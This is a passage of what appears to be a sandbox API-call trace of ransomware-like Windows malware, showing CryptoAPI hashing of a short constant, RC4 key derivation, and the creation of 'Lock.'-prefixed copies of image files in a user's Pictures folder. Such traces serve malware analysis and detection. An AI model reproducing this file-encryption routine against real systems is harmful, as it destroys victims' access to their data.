lpsz="SSA1A0070620F") returned 0xd [0208.898] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.898] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.898] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.898] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.898] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.898] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.898] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.898] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.898] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.898] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.898] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.898] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.898] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.898] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.898] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.898] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.898] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.898] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.898] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.898] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.898] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.898] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.898] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab1d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0208.899] CryptCreateHash (in: hProv=0xa7bc48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0208.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.899] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0208.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.899] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.899] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.899] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.899] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.899] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.900] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0208.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab410, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0208.900] CryptHashData (hHash=0x9e2138, pbData=0x2a71ca8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0208.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.900] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.900] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.900] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.900] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.900] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.900] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.900] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.900] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.900] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.900] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.900] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0208.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab3b0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0208.900] CryptDeriveKey (in: hProv=0xa7bc48, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1ab8) returned 1 [0208.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.901] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.901] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.901] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.901] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.901] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.901] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0208.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7180, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0208.901] CryptDestroyHash (hHash=0x9e2138) returned 1 [0208.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.901] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.901] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.901] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.901] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.902] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/8xG9dA2_eGqi0pv0b0.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\8xg9da2_egqi0pv0b0.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0208.902] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.902] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0208.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fa0 [0208.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0208.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0208.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0208.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0208.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0208.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a73b60 [0208.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.904] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0208.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73b60 | out: hHeap=0x2af0000) returned 1 [0208.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0208.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0208.904] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.8xG9dA2_eGqi0pv0b0.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.8xg9da2_egqi0pv0b0.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0208.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70e0 [0208.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.905] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0208.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0208.905] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0208.905] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0208.905] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0208.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0208.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0208.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0208.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0208.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0208.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0208.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 